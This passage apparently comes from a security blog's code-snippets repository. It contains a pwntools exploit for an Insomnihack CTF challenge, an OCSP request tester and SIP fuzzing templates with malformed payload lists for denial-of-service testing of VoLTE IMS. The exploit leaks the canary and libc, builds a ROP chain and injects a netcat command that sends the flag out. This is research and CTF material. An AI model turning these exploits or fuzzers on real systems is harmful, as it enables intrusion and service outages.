├── Insomnihack ├── README.md ├── baby-6971f0aeb454444a72cb5b7ac92524cd945812c2.tgz └── exploit.py ├── OCSP ├── README.md ├── client.py └── ocsp.py ├── README.md ├── VoLTE-dizzy ├── README.md ├── faultyIP.txt ├── integer.txt ├── invite.dizz ├── message.dizz ├── methods.txt ├── register.dizz └── subscribe.dizz ├── Win10-privacy ├── README.md └── Win10_Recommendation_1.0.xlsx ├── bmc_bladelogic ├── README.md ├── changePwd.py └── getUsers.py ├── gsm_troopers ├── README.md └── smpp_example_listener.py ├── malware_dissection_part2 ├── aubR9KfZ.xsl └── macro.vbs ├── maxcube ├── README.md ├── decrypt.py ├── firmware │ ├── firmware.enc │ └── parser │ │ ├── FirmwareFile.java │ │ └── FirmwareParser.java └── maxcube-info.nse ├── netmon_troopers ├── README.md ├── collectd.conf ├── grafana.ini ├── home_dashboard_troopers.json ├── influxdb.conf ├── screenshots │ ├── grafana_dashboard_netmon_troopers.png │ └── grafana_dashboard_netmon_troopers_bandwidth.png ├── scripts │ ├── cisco_arp_nbc.sh │ ├── cisco_wlc_bands.sh │ └── snmp_gw_wlc_troopers.py └── types_local.db ├── webex-linux ├── README.MD └── webex.sh └── windows_kernel_exploitation └── HEVD_64Kernel_UAF.py /Insomnihack/README.md: -------------------------------------------------------------------------------- 1 | Blog post: https://insinuator.net/2017/01/insomnihack-pwn50-write-up/ 2 | -------------------------------------------------------------------------------- /Insomnihack/baby-6971f0aeb454444a72cb5b7ac92524cd945812c2.tgz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ernw/insinuator-snippets/837feffb79db74cc1566541c3373db315e817ba0/Insomnihack/baby-6971f0aeb454444a72cb5b7ac92524cd945812c2.tgz -------------------------------------------------------------------------------- /Insomnihack/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import struct 3 | import IPython 4 | System = 0 5 
| System_Offset = 0x045390 6 | Shellcode = "AAAAAAAAAAAAAAAAAAAAAA; nc 1234 < flag;" + "\x00" 7 | Image_Offset = 0x1bf0 8 | printf_offset = 0x202f08 9 | libc_offset = 0x20830 10 | 11 | 12 | conn = remote('baby.teaser.insomnihack.ch',1337) 13 | message = conn.recvuntil('>',drop=True) 14 | 15 | 16 | # Leak Stack Addresses 17 | def leak(n, s): 18 | conn.send('2\n') 19 | conn.recvline() 20 | conn.send("%"+ str(n) + "$p\n") 21 | conn.recvuntil('> ',drop=True) 22 | leak = conn.recvuntil('\n', drop=True) 23 | print("Leaked " + s + ": " + leak) 24 | return int(leak, 16) 25 | 26 | 27 | # Leak Stack Canary 28 | stack_canary = leak(138, "Stack Canary") 29 | 30 | # Leak Libc + System Address 31 | libc = leak(158, "Libc Address") 32 | libc = libc - libc_offset 33 | print("Leaked Libc Base: " + hex(libc)) 34 | System = libc + System_Offset 35 | print("Calculated System Address: " + hex(System)) 36 | 37 | ## Leak ImageBase 38 | image = leak(146, "Imagebase Pointer") 39 | image = image - Image_Offset 40 | printf = image + printf_offset 41 | print("Calculated ImageBase: " + hex(image)) 42 | print("Calculated GoT Offset for PrintF: " + hex(printf)) 43 | 44 | ### Leak Stack Address 45 | stack = leak(1, "Stack Address") 46 | 47 | #Building ROP 48 | gadgets = "".join([struct.pack(" ',drop=True)) 58 | answer = "" 59 | print("sending 1") 60 | conn.send('1\n') 61 | print("sending 2000") 62 | conn.send('1300\n') 63 | print("sending BO Trigger") 64 | 65 | 66 | #Building Buffer 67 | Buffer = Shellcode + "A"*(1037-len(Shellcode)) + p64(stack_canary) + "A" * 8 + gadgets + p64(stack) + p64(System) + "E" * (1300-1032-8-len(gadgets)-8-8) 68 | conn.send(Buffer + '\n') 69 | 70 | 71 | 72 | 73 | 74 | -------------------------------------------------------------------------------- /OCSP/README.md: -------------------------------------------------------------------------------- 1 | Blog post: https://insinuator.net/2015/10/ocsp-over-http-testing-with-python/ 2 | 
-------------------------------------------------------------------------------- /OCSP/client.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: utf-8 3 | import requests 4 | from pyasn1.type import univ 5 | from pyasn1.codec.ber import decoder, encoder 6 | from pyasn1_modules import rfc2459 7 | 8 | from ocsp import * 9 | 10 | # settings 11 | URL = 'https://yourdomain.tld/OCSP' 12 | PROXIES = { 13 | "http": "http://127.0.0.1:8080", 14 | "https": "http://127.0.0.1:8080", 15 | } 16 | 17 | # variables 18 | SERIAL_NUMBER = 0 19 | ISSUER_NAME_HASH = '01cb3044531fa8618a68d3c60596ab0555866b09' 20 | ISSUER_KEY_HASH = '31c3791bbaf553d717e0897a2d176c0ab32b9d33' 21 | ALGORITHM = rfc2437.id_sha1 22 | ALGO_PARAMS_HEX = '0500' 23 | 24 | 25 | 26 | def build_payload(): 27 | # initializations 28 | tbsReq = TBSRequest() 29 | certid = CertID() 30 | request = Request() 31 | requestList = univ.SequenceOf(componentType=Request()) 32 | req = OCSPRequest() 33 | reqExts = rfc2459.Extensions().subtype( 34 | explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 2)) 35 | reqExt = rfc2459.Extension() 36 | signature = Signature() 37 | certs = univ.SequenceOf(componentType=rfc2459.Certificate()).subtype( 38 | explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0) 39 | ) 40 | cert = rfc2459.Certificate() 41 | name = rfc2459.GeneralName() 42 | 43 | 44 | # assignments 45 | certid['hashAlgorithm'] = rfc2459.AlgorithmIdentifier()\ 46 | .setComponentByName('algorithm', ALGORITHM)\ 47 | .setComponentByName('parameters', univ.Any(hexValue=ALGO_PARAMS_HEX)) 48 | 49 | certid['issuerNameHash'] = univ.OctetString(hexValue=ISSUER_NAME_HASH) 50 | certid['issuerKeyHash'] = univ.OctetString(hexValue=ISSUER_KEY_HASH) 51 | certid['serialNumber'] = rfc2459.CertificateSerialNumber(SERIAL_NUMBER) 52 | 53 | request['reqCert'] = certid 54 | 55 | # optional field 56 | #request['singleRequestExtension'] = reqExt 57 | 58 | 
reqExt['extnID'] = univ.ObjectIdentifier('1.3.6.1.5.5.7.48.1.2') 59 | reqExt['critical'] = univ.Boolean('False') 60 | reqExt['extnValue'] = univ.Any(hexValue='04120410236e5193af7958f49edcc756ed6c6dd3') 61 | 62 | reqExts[0] = reqExt 63 | requestList[0] = request 64 | 65 | # optional 66 | # TODO: fill name? 67 | #tbsReq['requestorName'] = name 68 | tbsReq['requestList'] = requestList 69 | 70 | # optional 71 | tbsReq['requestExtensions'] = reqExts 72 | tbsReq['version'] = Version(0).subtype( 73 | explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0)) 74 | 75 | # optional 76 | # TODO fill cert? 77 | signature['signatureAlgorithm'] = rfc2459.AlgorithmIdentifier()\ 78 | .setComponentByName('algorithm', rfc2437.sha1WithRSAEncryption) 79 | signature['signature'] = univ.BitString("'010101010101'B") 80 | certs[0] = cert 81 | signature['certs'] = certs 82 | 83 | req['tbsRequest'] = tbsReq 84 | # optional signature 85 | #req['optionalSignature'] = signature 86 | 87 | return req 88 | 89 | 90 | def send_payload(payload): 91 | # encode in ASN.1 92 | data = encoder.encode(payload) 93 | 94 | # send to server 95 | response = requests.post(URL, 96 | headers={'Content-Type': 'application/ocsp-request'}, 97 | data=data, 98 | proxies=PROXIES) 99 | 100 | return response.content 101 | 102 | 103 | def decode(data, spec): 104 | # decode response 105 | ocspResponse = decoder.decode(data, asn1Spec=spec) 106 | 107 | for r in ocspResponse: 108 | # is asn.1 decodable? 
109 | if hasattr(r, 'prettyPrint'): 110 | return r 111 | 112 | 113 | if __name__ == '__main__': 114 | from pyasn1 import debug 115 | 116 | payload = build_payload() 117 | response = send_payload(payload) 118 | response = decode(response, OCSPResponse()) 119 | print("Status:", response['responseStatus'].prettyPrint()) 120 | #debug.setLogger(debug.Debug('all')) 121 | response = decode(response['responseBytes']['response'], BasicOCSPResponse()) 122 | print(response.prettyPrint()) 123 | -------------------------------------------------------------------------------- /OCSP/ocsp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: utf-8 3 | # author: Timo Schmid 4 | # license: GPLv3 5 | 6 | from pyasn1.type import univ, namedtype, tag, namedval, base, useful 7 | from pyasn1_modules import rfc2459, rfc2437, rfc2560 8 | 9 | # request 10 | class Version(univ.Integer): 11 | namedValues = namedval.NamedValues( 12 | ('v1', 0) 13 | ) 14 | 15 | 16 | class CertID(univ.Sequence): 17 | componentType = namedtype.NamedTypes( 18 | namedtype.NamedType('hashAlgorithm', rfc2459.AlgorithmIdentifier()), 19 | namedtype.NamedType('issuerNameHash', univ.OctetString()), 20 | namedtype.NamedType('issuerKeyHash', univ.OctetString()), 21 | namedtype.NamedType('serialNumber', rfc2459.CertificateSerialNumber()) 22 | ) 23 | 24 | 25 | class Request(univ.Sequence): 26 | componentType = namedtype.NamedTypes( 27 | namedtype.NamedType('reqCert', CertID()), 28 | namedtype.OptionalNamedType('singleRequestExtensions', rfc2459.Extensions().subtype( 29 | explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0) 30 | )) 31 | ) 32 | 33 | 34 | class TBSRequest(univ.Sequence): 35 | componentType = namedtype.NamedTypes( 36 | namedtype.DefaultedNamedType('version', Version(0).subtype( 37 | explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0))), 38 | namedtype.OptionalNamedType('requestorName', rfc2459.GeneralName().subtype( 
39 | explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 1) 40 | )), 41 | namedtype.NamedType('requestList', univ.SequenceOf(componentType=Request())), 42 | namedtype.OptionalNamedType('requestExtensions', rfc2459.Extensions().subtype( 43 | explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 2) 44 | )) 45 | ) 46 | 47 | 48 | class Certs(univ.SequenceOf): 49 | componentType=rfc2459.Certificate() 50 | 51 | 52 | class Signature(univ.Sequence): 53 | componentType = namedtype.NamedTypes( 54 | namedtype.NamedType('signatureAlgorithm', rfc2459.AlgorithmIdentifier()), 55 | namedtype.NamedType('signature', univ.BitString()), 56 | namedtype.NamedType('certs', Certs().subtype( 57 | explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0) 58 | ) 59 | ) 60 | ) 61 | 62 | 63 | class OCSPRequest(univ.Sequence): 64 | componentType = namedtype.NamedTypes( 65 | namedtype.NamedType('tbsRequest', TBSRequest()), 66 | namedtype.OptionalNamedType('optionalSignature', Signature().subtype( 67 | explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0))) 68 | ) 69 | 70 | 71 | 72 | # response 73 | class OCSPResponseStatus(univ.Enumerated): 74 | namedValues = namedval.NamedValues( 75 | ('successful', 0), 76 | ('malformedRequest', 1), 77 | ('internalError', 2), 78 | ('tryLater', 3), 79 | #('not-used', 4), 80 | ('sigRequired', 5), 81 | ('unauthorized', 6) 82 | ) 83 | 84 | 85 | class ResponseBytes(univ.Sequence): 86 | componentType = namedtype.NamedTypes( 87 | namedtype.NamedType('responseType', univ.ObjectIdentifier()), 88 | namedtype.NamedType('response', univ.OctetString()) 89 | ) 90 | 91 | 92 | class OCSPResponse(univ.Sequence): 93 | componentType = namedtype.NamedTypes( 94 | namedtype.NamedType('responseStatus', OCSPResponseStatus()), 95 | namedtype.OptionalNamedType('responseBytes', ResponseBytes().subtype( 96 | explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0) 97 | )) 98 | ) 99 | 100 | 101 | KeyHash = univ.OctetString 102 | UnknownInfo = 
univ.Null 103 | 104 | 105 | class RevokedInfo(univ.Sequence): 106 | componentType = namedtype.NamedTypes( 107 | namedtype.NamedType('revocationTime', useful.GeneralizedTime()), 108 | namedtype.OptionalNamedType('revocationReason', rfc2459.CRLReason().subtype( 109 | explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0) 110 | )) 111 | ) 112 | 113 | 114 | class CertStatus(univ.Choice): 115 | componentType = namedtype.NamedTypes( 116 | namedtype.NamedType('good', univ.Null().subtype( 117 | implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0) 118 | )), 119 | namedtype.NamedType('revoked', RevokedInfo().subtype( 120 | implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 1) 121 | )), 122 | namedtype.NamedType('unknown', UnknownInfo().subtype( 123 | implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 2) 124 | )) 125 | ) 126 | 127 | 128 | class SingleResponse(univ.Sequence): 129 | componentType = namedtype.NamedTypes( 130 | namedtype.NamedType('certID', CertID()), 131 | namedtype.NamedType('certStatus', CertStatus()), 132 | namedtype.NamedType('thisUpdate', useful.GeneralizedTime()), 133 | namedtype.OptionalNamedType('nextUpdate', useful.GeneralizedTime().subtype( 134 | explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0) 135 | )), 136 | namedtype.OptionalNamedType('singleExtensions', rfc2459.Extensions().subtype( 137 | explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 2) 138 | )) 139 | ) 140 | 141 | 142 | class ResponderID(univ.Choice): 143 | componentType = namedtype.NamedTypes( 144 | namedtype.NamedType('byName', rfc2459.Name().subtype( 145 | explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 1))), 146 | namedtype.NamedType('byKey', KeyHash().subtype( 147 | explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 2))), 148 | ) 149 | 150 | 151 | class ResponseData(univ.Sequence): 152 | componentType = namedtype.NamedTypes( 153 | namedtype.DefaultedNamedType('version', Version(0).subtype( 154 
| explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0))), 155 | namedtype.NamedType('responderID', ResponderID()), 156 | namedtype.NamedType('producedAt', useful.GeneralizedTime()), 157 | namedtype.NamedType('responses', univ.SequenceOf(componentType=SingleResponse())), 158 | namedtype.OptionalNamedType('responseExtensions', rfc2459.Extensions().subtype( 159 | explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 1) 160 | )) 161 | ) 162 | 163 | 164 | class BasicOCSPResponse(univ.Sequence): 165 | componentType = namedtype.NamedTypes( 166 | namedtype.NamedType('tbsResponseData', ResponseData()), 167 | namedtype.NamedType('signatureAlgorithm', rfc2459.AlgorithmIdentifier()), 168 | namedtype.NamedType('signature', univ.BitString()), 169 | namedtype.OptionalNamedType('certs', Certs().subtype( 170 | explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0) 171 | )) 172 | ) 173 | 174 | 175 | 176 | if __name__ == '__main__': 177 | import sys 178 | from pyasn1 import debug 179 | from pyasn1.codec.ber import decoder, encoder 180 | 181 | #debug.setLogger(debug.Debug('all')) 182 | 183 | if len(sys.argv) <= 1: 184 | req = OCSPRequest() 185 | req['tbsRequest'] = TBSRequest() 186 | req['tbsRequest']['version'] = Version(0).subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0)) 187 | request = Request() 188 | certid = CertID() 189 | request['reqCert'] = certid 190 | certid['hashAlgorithm'] = rfc2459.AlgorithmIdentifier()\ 191 | .setComponentByName('algorithm', rfc2437.id_sha1)\ 192 | .setComponentByName('parameters', univ.Any(hexValue='0500')) 193 | certid['issuerNameHash'] = univ.OctetString(hexValue='01cb3044531fa8618a68d3c60596ab0555866b09') 194 | certid['issuerKeyHash'] = univ.OctetString(hexValue='31c3791bbaf553d717e0897a2d176c0ab32b9d33') 195 | certid['serialNumber'] = rfc2459.CertificateSerialNumber(0) 196 | req['tbsRequest']['requestList'] = univ.SequenceOf(componentType=Request()).setComponentByPosition(0, request) 197 | 
reqExts = rfc2459.Extensions().subtype( 198 | explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 2)) 199 | reqExt = rfc2459.Extension() 200 | reqExt['extnID'] = univ.ObjectIdentifier('1.3.6.1.5.5.7.48.1.2') 201 | reqExt['critical'] = univ.Boolean('False') 202 | reqExt['extnValue'] = univ.Any(hexValue='04120410236e5193af7958f49edcc756ed6c6dd3') 203 | reqExts[0] = reqExt 204 | req['tbsRequest']['requestExtensions'] = reqExts 205 | print(req.prettyPrint()) 206 | 207 | print(encoder.encode(req)) 208 | else: 209 | with open(sys.argv[1], 'rb') as fp: 210 | for t in decoder.decode(fp.read(), asn1Spec=OCSPRequest()): 211 | if hasattr(t, 'prettyPrint'): 212 | print(t.prettyPrint()) 213 | else: 214 | print(t) 215 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | Insinuator Snippets 2 | =================== 3 | 4 | This repository contains code and files referenced in [Insinuator](https://www.insinuator.net/) blog posts. 5 | -------------------------------------------------------------------------------- /VoLTE-dizzy/README.md: -------------------------------------------------------------------------------- 1 | The .dizz files create malformed SIP messages to fuzz an IMS, which manages Multimedia services of LTE networks such as voice calls and text messages. 2 | 3 | The generated SIP messages simulate those exchanged with OpenIMS, which is an open source simulation of an IMS environment. 4 | The files faultyIP.txt, integer.txt and method.txt are contain payloads to attack parameters that usually take IP addresses, integers and SIP methods respectively. They might not be as effective as dizzy standard payloads but they save time. 
5 | 6 | Any suggestions to modify dizz files or the payload files are welcome :) 7 | 8 | For more information about the attacks, please visit the blogpost https://www.insinuator.net/2016/02/denial-of-service-attacks-on-volte/ 9 | -------------------------------------------------------------------------------- /VoLTE-dizzy/faultyIP.txt: -------------------------------------------------------------------------------- 1 | 0.0.0.0 2 | 257.0.0.0 3 | 255.255.255.255 4 | 192.168.56 5 | 10.2 6 | 127.0.0.1 7 | 192.168.56.4/18 -------------------------------------------------------------------------------- /VoLTE-dizzy/integer.txt: -------------------------------------------------------------------------------- 1 | \x01\x00 2 | \x01\x00\x00 3 | \x01\x00\x00\x00\x00 4 | \x01\x00\x00\x00\x00\x00\x00\x00\x00 5 | \x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 6 | 0 7 | -3 8 | 1000000000000000000 9 | 4.7 10 | abc 11 | 4'89 12 | 8,08 13 | 3/67 14 | 5T7a 15 | 01 16 | 000000000000000000000000000000000000000000000000000000000000000000000001 -------------------------------------------------------------------------------- /VoLTE-dizzy/invite.dizz: -------------------------------------------------------------------------------- 1 | #SIP Invite 2 | #User already registered 3 | 4 | ip_dst = "192.168.56.103" 5 | ip_src = "192.168.56.101" 6 | port_src = "5060" 7 | #P-CSCF port number 8 | port_dst = "4060" 9 | impu_host = "alice" 10 | callee_host = "bob" 11 | domain = "open-ims.test" 12 | 13 | name = "SIP INVITE" 14 | 15 | objects = [ 16 | #INVITE sip:bob@open-ims.test SIP/2.0 17 | list("Method", "INVITE", "dizzes/sip/methods.txt"), 18 | field("blank1", 8, " ", none), 19 | field("prot1", 24, "sip", none), 20 | field("sep1",8, ":", none), 21 | field("calee1",None,callee_host,none) , 22 | field("sep76", 8, "@", none), 23 | field("reqURI", None,domain,none), 24 | field("blank2", 8, " ", none), 25 | field("sip_version", 56, "SIP/2.0", none), 26 | field("crlf1",16, 
"\x0d\x0a", none), 27 | # Call-ID: 080027d9-2ede0003-00001c04-00000403 28 | field("name4", 56, "Call-ID", none), 29 | field("sep12", 8, ":", none), 30 | field("call_id", None, "578222729-4665d775", std), 31 | field("crlf5", 16, "\x0d\x0a", none), 32 | #CSeq: 101 INVITE 33 | field("name7", 32, "CSeq", none), 34 | field("sep15", 8, ":", none), 35 | field("blank6", 8, " ", none), 36 | list("CSeq_num", "5", "dizzes/sip/integer.txt"), 37 | field("blank7", 8, " ", none), 38 | list("method2", "INVITE", "dizzes/sip/methods.txt"), 39 | field("crlf8", 16, "\x0d\x0a", none), 40 | #From: "Alice" ;tag=1102 41 | field("name2", 32, "From", none), 42 | field("sep5", 8, ":", none), 43 | field("blank5", 8, " ", none), 44 | field("fromName", None, '"Alice"', none), 45 | field("blank51", 8, " ", none), 46 | field("lt1", 8, "<", none), 47 | field("prot3", 24, "sip", none), 48 | field("sep6", 8, ":", none), 49 | field("impuHost", None, impu_host, std), 50 | field("sep7", 8, "@", none), 51 | field("domain", None, domain, none), 52 | field("gt1", 8, ">", none), 53 | field("sep8", 8, ";", none), 54 | field("tag343", 24, "tag", none), 55 | field("equal8", 8, "=", none), 56 | field("tag2", None, "903df0a", std), 57 | field("crlf3", 16, "\x0d\x0a", none), 58 | # To: 59 | field("name3",16, "To", none), 60 | field("sep9", 8, ":", none), 61 | field("lt2", 8, "<", none), 62 | field("prot4", 24, "sip", none), 63 | field("sep10", 8, ":", none), 64 | field("session_id2", None, callee_host, none), 65 | field("sep11", 8, "@", none), 66 | field("domainTo", None, domain, none), 67 | field("gt2", 8, ">", none), 68 | field("crlf4", 16, "\x0d\x0a", none), 69 | # Via: SIP/2.0/UDP 192.168.56.101:5060;branch=z9hG4bK00000241 70 | field("via", 24, "Via", none), 71 | field("sep2", 8, ":", none), 72 | field("blank3", 8, " ", none), 73 | field("prot2", 88, "SIP/2.0/UDP", none), 74 | field("blank4", 8, " ", none), 75 | list("ipViaList", ip_src, "dizzes/sip/faultyIP.txt"), 76 | field("separator3", 8, ":", none), 77 
| field("port1", None, port_src, none), 78 | field("sep3", 8, ";", none), 79 | field("tag28", 48, "branch", none), 80 | field("equal1", 8, "=", none), 81 | field("branch" , None, "z9hG4bKnp151248737", std), 82 | field("crlf2", 16, "\x0d\x0a", none), 83 | # Max-Forwards: 70 84 | field("name5", 96, "Max-Forwards", none), 85 | field("sep13", 8, ":", none), 86 | list("max_forwards", "20", "dizzes/sip/integer.txt"), 87 | field("crlf6", 16, "\x0d\x0a", none), 88 | # Route: 89 | field("nameRoute", 40, "Route", none), 90 | field("sepR1", 8, ":", none), 91 | field("blankR1", 8, " ", none), 92 | field("ltR1", 8, "<", none), 93 | field("protR1", 24, "sip", none), 94 | field("sepR2", 8, ":", none), 95 | field("theWholeRoute",None,"orig@scscf.open-ims.test",std), 96 | field("sepR3", 8, ":", none), 97 | list("portR2", "6060", "dizzes/sip/integer.txt"), 98 | field("sepR5", 8, ";", none), 99 | field("lr", 16, "lr", none), 100 | field("gtR3", 8, ">", none), 101 | field("crlfRoute", 16, "\x0d\x0a", none), 102 | #Content-Type: application/sdp 103 | field("nameCT", None, "Content-Type", none), 104 | field("sepCT", 8, ":", none), 105 | field("stringCT", None, "application/sdp", none), 106 | field("crlfCT", 16, "\x0d\x0a", none), 107 | #Contact: 108 | field("name9", 56, "Contact", none), 109 | field("sep16", 8, ":", none), 110 | field("blank8", 8, " ", none), 111 | field("lt3", 8, "<", none), 112 | field("prot5", 24, "sip", none), 113 | field("sep17", 8, ":", none), 114 | field("impuHostContact", None, impu_host, none), 115 | field("sep18", 8, "@", none), 116 | list("ipContList", ip_src, "dizzes/sip/faultyIP.txt"), 117 | field("sep19", 8, ":", none), 118 | list("contactPortList", port_src, "dizzes/sip/integer.txt"), 119 | field("sep20", 8, ";", none), 120 | field("tag3", None, "line", none), 121 | field("equal2", 8, "=", none), 122 | field("tag4", None, "9c7d2db8822013c", none), 123 | field("gt3", 8, ">", none), 124 | field("crlf9", 16, "\x0d\x0a", none), 125 | #User-Agent: 
Cisco-SIPIPCommunicator/9.1.1 126 | field("name8", 80, "User-Agent", none), 127 | field("sep21", 8, ":", none), 128 | field("string", None, "Cisco-SIPIPCommunicator", none), 129 | field("sep23", 8, "/", none), 130 | field("version", None, "9.1.1", none), 131 | field("crlf10", 16, "\x0d\x0a", none), 132 | #Content-Length: 118 133 | field("name10", None, "Content-Length", none), 134 | field("sep22", 8, ":", none), 135 | #field("string2", None, "118", none), 136 | list("contLengthList", "118", "dizzes/sip/integer.txt"), 137 | field("crlfContLength", 16, "\x0d\x0a", none), 138 | # Close Header with CRLF 139 | field("crlf11", 16, "\x0d\x0a", none), 140 | #SDP 141 | field("sdp1", 24, "v=0", none), 142 | field("newLine1", 16, "\x0d\x0a", none), 143 | field("sdp2", None, "o=user 0 0 IN IP4 127.0.1.1", none), 144 | field("newLine2", 16, "\x0d\x0a", none), 145 | field("sdp_S", None, "s=The funky IMS stream", none), 146 | field("newLine13", 16, "\x0d\x0a", none), 147 | field("sdp3", None, "c=IN IP4 192.168.56.101", none), 148 | field("newLine3", 16, "\x0d\x0a", none), 149 | field("sdp_t", None, "t=0 0", none), 150 | field("newLine_t", 16, "\x0d\x0a", none), 151 | field("sdp4", None, "m=audio 8000 RTP/AVP 0 3 8", none), 152 | field("newLine4", 16, "\x0d\x0a", none), 153 | #field("crlfFinal", 16, "\x0d\x0a", none), 154 | ] 155 | 156 | functions=[] 157 | -------------------------------------------------------------------------------- /VoLTE-dizzy/message.dizz: -------------------------------------------------------------------------------- 1 | #SIP Message 2 | 3 | ip_src = "192.168.56.101" 4 | ip_dst = "192.168.56.102" 5 | port_src = "5060" 6 | port_dst = "4060" 7 | impu_host = "alice" 8 | impu_rx = "bob" 9 | domain = "open-ims.test" 10 | 11 | name = "SIP Subscribe" 12 | 13 | objects = [ 14 | #MESSAGE sip:bob@open-ims.test SIP/2.0 15 | list("Method", "MESSAGE", "dizzes/sip/methods.txt"), 16 | #field("Method", None, "MESSAGE", none), 17 | field("blank1", 8, " ", none), 18 | 
field("prot1", 24, "sip", none), 19 | field("sep1",8, ":", none), 20 | field("reqHost",None, impu_rx, none), 21 | field("reqAt",8, "@", none), 22 | field("reqURI",104,domain,none), 23 | field("blank2", 8, " ", none), 24 | field("sip_version", 56, "SIP/2.0", none), 25 | field("crlf1",16, "\x0d\x0a", none), 26 | # Call-ID: 15c6999b990b1ac5e9139309abff7a46 27 | field("nameCID", 56, "Call-ID", none), 28 | field("sepCID", 16, ": ", none), 29 | field("CallID", None, "15c6999b990b1ac5e9139309abff7a46", none), 30 | field("crlf5", 16, "\x0d\x0a", none), 31 | # CSeq: 10 MESSAGE 32 | field("nameCSeq", 32, "CSeq", none), 33 | field("sepCSeq", 8, ":", none), 34 | field("blankCSeq", 8, " ", none), 35 | list("CSeqNum", "10", "dizzes/sip/integer.txt"), 36 | # field("CSeqNumField", None, "10", none), 37 | field("blankCSeq2", 8, " ", none), 38 | list("methodCSeq", "MESSAGE", "dizzes/sip/methods.txt"), 39 | field("crlf8", 16, "\x0d\x0a", none), 40 | # From: ;tag=1000 41 | field("name2", 32, "From", none), 42 | field("sep5", 8, ":", none), 43 | field("blank5", 8, " ", none), 44 | field("fromName", None, '"Alice"', none), 45 | field("blank51", 8, " ", none), 46 | field("lt1", 8, "<", none), 47 | field("prot3", 24, "sip", none), 48 | field("sep6", 8, ":", none), 49 | field("impuHost", None, impu_host, none), 50 | field("sep7", 8, "@", none), 51 | field("domain", None, domain, none), 52 | field("gt1", 8, ">", none), 53 | field("sep8", 8, ";", none), 54 | field("tag343", 24, "tag", none), 55 | field("equal8", 8, "=", none), 56 | field("tag2", None, "903df0a", std), 57 | field("crlf3", 16, "\x0d\x0a", none), 58 | # To: "Bob" 59 | field("name3",16, "To", none), 60 | field("sep9", 8, ":", none), 61 | field("blankTo", 8, " ", none), 62 | field("ToName", None, '"Bob"', none), 63 | field("blankTo1", 8, " ", none), 64 | field("lt2", 8, "<", none), 65 | field("prot4", 24, "sip", none), 66 | field("sep10", 8, ":", none), 67 | field("impuHost2", None, impu_rx, none), 68 | field("sep11", 8, "@", 
none), 69 | field("domainTo", None, domain, none), 70 | field("gt2", 8, ">", none), 71 | field("crlf4", 16, "\x0d\x0a", none), 72 | # Via: SIP/2.0/UDP 192.168.56.101:5060;branch=z9hG4bK41760951933bd19eaccc65c1e80dd321 73 | field("via", 24, "Via", none), 74 | field("sep2", 8, ":", none), 75 | field("blank3", 8, " ", none), 76 | field("prot2", 88, "SIP/2.0/UDP", none), 77 | field("blank4", 8, " ", none), 78 | #field("ipVia", len(ip_src)*8, ip_src, none), 79 | list("ipViaList", ip_src, "dizzes/sip/faultyIP.txt"), 80 | field("separator3", 8, ":", none), 81 | field("port1", None, port_src, none), 82 | field("sep3", 8, ";", none), 83 | field("tag28", 48, "branch", none), 84 | field("equal1", 8, "=", none), 85 | field("branch", None, "z9hG4bKnp151248737", std), 86 | field("crlf2", 16, "\x0d\x0a", none), 87 | # Max-Forwards: 70 88 | field("name5", 96, "Max-Forwards", none), 89 | field("sep13", 16, ": ", none), 90 | list("maxForwards", "70", "dizzes/sip/integer.txt"), 91 | #field("max_forwards", None, "70", std), 92 | field("crlf6", 16, "\x0d\x0a", none), 93 | # Content-Type: text/plain 94 | field("contType", None, "Content-Type", none), 95 | field("scolcontType", 8, ":", none), 96 | field("spacecontType", 8, " ", none), 97 | field("contTypeValue", None, "text/plain", none), 98 | field("crlfcontType", 16, "\x0d\x0a", none), 99 | # Route: 100 | field("nameRoute", 40, "Route", none), 101 | field("sepR1", 8, ":", none), 102 | field("blankR1", 8, " ", none), 103 | field("ltR1", 8, "<", none), 104 | field("protR1", 24, "sip", none), 105 | field("sepR2", 8, ":", none), 106 | field("theWholeRoute",None,"orig@scscf.open-ims.test",std), 107 | field("sepR3", 8, ":", none), 108 | list("portR2", "6060", "dizzes/sip/integer.txt"), 109 | field("sepR5", 8, ";", none), 110 | field("lr", 16, "lr", none), 111 | field("gtR3", 8, ">", none), 112 | field("crlfRoute", 16, "\x0d\x0a", none), 113 | # Contact: 114 | field("name9", 56, "Contact", none), 115 | field("sep16", 8, ":", none), 116 | 
